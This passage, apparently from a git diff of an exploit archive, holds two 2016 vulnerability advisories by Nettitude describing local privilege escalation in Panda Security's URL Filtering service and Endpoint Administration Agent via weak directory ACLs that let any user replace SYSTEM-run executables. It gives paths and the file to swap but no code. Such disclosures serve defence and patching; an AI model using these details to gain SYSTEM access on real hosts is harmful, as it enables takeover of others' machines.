* Affected Version: Panda Security URL Filtering < v4.3.1.9
|
||||
* Fixed Version: Panda Security URL Filtering v4.3.1.9
|
||||
|
||||
Description:
|
||||
All Panda Security 2016 Home User products for Windows are vulnerable to privilege escalation, which allows a local attacker to execute code as SYSTEM from any account (Guest included), thus completely compromising the affected host.
|
||||
|
||||
|
||||
Affected Products:
|
||||
|
||||
Panda Gold Protection 2016 v16.0.1
|
||||
Panda Global Protection 2016 v16.0.1
|
||||
Panda Internet Security 2016 v16.0.1
|
||||
Panda Antivirus Pro 2016 v16.0.1
|
||||
Panda Free Antivirus v16.0.1
|
||||
|
||||
|
||||
Impact:
|
||||
|
||||
A local attacker can elevate his privileges from any user account and execute code as SYSTEM.
|
||||
|
||||
|
||||
Technical Details:
|
||||
|
||||
By default all the aforementioned products install (current version:4.3.0.4), which creates a service named 'panda_url_filtering' that runs as SYSTEM.
|
||||
The executable modules are by default installed in "C:\ProgramData\Panda Security URL Filtering" directory.
|
||||
However, the ACLs assigned to the directory itself, and to the rest of the installed files, allow any user to modify those files and/or substitute them with malicious ones.
|
||||
A local attacker can easily execute code with SYSTEM account privileges by modifying or substituting the main executable module of this service, 'Panda_URL_Filteringb.exe', which will run at the next reboot of the host.
|
||||
|
||||
|
||||
Disclosure Log:
|
||||
Vendor Contacted: 28/09/2015
|
||||
Public Disclosure: 05/04/2016
|
||||
|
||||
Copyright:
|
||||
Copyright (c) Nettitude Limited 2016, All rights reserved worldwide.
|
||||
|
||||
Disclaimer:
|
||||
The information herein contained may change without notice. Any use of this information is at the user's risk and discretion and is provided with no warranties. Nettitude and the author cannot be held liable for any impact resulting from the use of this information.
|
||||
|
||||
Kyriakos Economou
|
||||
Vulnerability Researcher
|
40
platforms/windows/local/39671.txt
Executable file
40
platforms/windows/local/39671.txt
Executable file
|
@ -0,0 +1,40 @@
|
|||
* CVE: CVE-2016-3943
|
||||
* Vendor: Panda Security
|
||||
* Reported by: Kyriakos Economou
|
||||
* Date of Release: 05/04/2016
|
||||
* Affected Products: Multiple
|
||||
* Affected Version: Panda Endpoint Administration Agent < v7.50.00
|
||||
* Fixed Version: Panda Endpoint Administration Agent v7.50.00
|
||||
|
||||
|
||||
Description:
|
||||
Panda Endpoint Administration Agent v7.30.2 allows a local attacker to elevate his privileges from any account type (Guest included) and execute code as SYSTEM, thus completely compromising the affected host.
|
||||
|
||||
|
||||
Affected Products:
|
||||
|
||||
Any Panda Security For Business products for Windows using this Agent service are vulnerable.
|
||||
|
||||
|
||||
Technical Details:
|
||||
|
||||
Upon installing some Panda Security for Business products for Windows, such as Panda Endpoint Protection/Plus, a service named as 'Panda Endpoint Administration Agent' is installed in the host. This service runs under the SYSTEM account. However, due to weak ACLs set to the installation directory ("C:\Program Files\Panda Security\WaAgent") of this application and its subdirectories, any user can modify or overwrite any executable module (dynamic link libraries and executables) installed in those directories.
|
||||
|
||||
|
||||
Impact:
|
||||
|
||||
A local attacker can elevate his privileges from any user account and execute code as SYSTEM.
|
||||
|
||||
|
||||
Disclosure Log:
|
||||
Vendor Contacted: 12/01/2016
|
||||
Public Disclosure: 05/04/2016
|
||||
|
||||
Copyright:
|
||||
Copyright (c) Nettitude Limited 2016, All rights reserved worldwide.
|
||||
|
||||
Disclaimer:
|
||||
The information herein contained may change without notice. Any use of this information is at the user's risk and discretion and is provided with no warranties. Nettitude and the author cannot be held liable for any impact resulting from the use of this information.
|
||||
|
||||
Kyriakos Economou
|
||||
Vulnerability Researcher
|
Loading…
Add table
Reference in a new issue